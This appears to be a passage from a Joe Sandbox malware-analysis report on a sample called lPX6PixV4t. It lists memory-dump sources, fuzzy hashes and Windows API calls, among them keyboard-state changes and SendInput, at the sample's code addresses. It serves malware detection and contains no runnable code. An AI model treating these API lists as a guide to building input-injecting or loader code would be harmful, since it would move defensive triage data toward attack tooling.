                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                          • String ID:
                          • API String ID: 2354583917-0
                          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                          APIs
                          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                          • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                          • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                          • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AddressProc$Library$FreeLoad
                          • String ID: #v
                          • API String ID: 2449869053-554117064
                          • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                          • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                          • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                          • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                          APIs
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$Enable$Show$MessageMoveSend
                          • String ID:
                          • API String ID: 896007046-0
                          • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                          • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                          • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                          • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                          APIs
                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                          • GetFocus.USER32 ref: 00448ACF
                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$Enable$Show$FocusMessageSend
                          • String ID:
                          • API String ID: 3429747543-0
                          • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                          • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                          • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                          • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                          • __swprintf.LIBCMT ref: 0045D4E9
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu$\VH
                          • API String ID: 3164766367-2432546070
                          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                          APIs
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Msctls_Progress32
                          • API String ID: 3850602802-3636473452
                          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                          • String ID:
                          • API String ID: 3985565216-0
                          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                          APIs
                          • _malloc.LIBCMT ref: 0041F707
                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                          • _free.LIBCMT ref: 0041F71A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AllocateHeap_free_malloc
                          • String ID: [B
                          • API String ID: 1020059152-632041663
                          • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                          • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                          APIs
                          • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                          • __calloc_crt.LIBCMT ref: 00413DB0
                          • __getptd.LIBCMT ref: 00413DBD
                          • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                          • _free.LIBCMT ref: 00413E07
                          • __dosmaperr.LIBCMT ref: 00413E12
                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                          • String ID:
                          • API String ID: 155776804-0
                          • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                          • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                          • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                          • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                          APIs
                            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                          • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                          • String ID:
                          • API String ID: 1957940570-0
                          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                          APIs
                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                          • ExitThread.KERNEL32 ref: 00413D4E
                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                          • __freefls@4.LIBCMT ref: 00413D74
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                          • String ID:
                          • API String ID: 259663610-0
                          • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                          • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                          • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                          • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                          APIs
                          • GetClientRect.USER32(?,?), ref: 004302E6
                          • GetWindowRect.USER32(00000000,?), ref: 00430316
                          • GetClientRect.USER32(?,?), ref: 00430364
                          • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                          • GetWindowRect.USER32(?,?), ref: 004303C3
                          • ScreenToClient.USER32(?,?), ref: 004303EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$MetricsScreenSystem
                          • String ID:
                          • API String ID: 3220332590-0
                          • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                          • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                          • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                          • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _malloc_wcslen$_strcat_wcscpy
                          • String ID:
                          • API String ID: 1612042205-0
                          • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                          • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                          • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                          • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove_strncmp
                          • String ID: >$U$\
                          • API String ID: 2666721431-237099441
                          • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                          • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                          • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                          • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                          APIs
                          • GetKeyboardState.USER32(?), ref: 0044C570
                          • SetKeyboardState.USER32(00000080), ref: 0044C594
                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
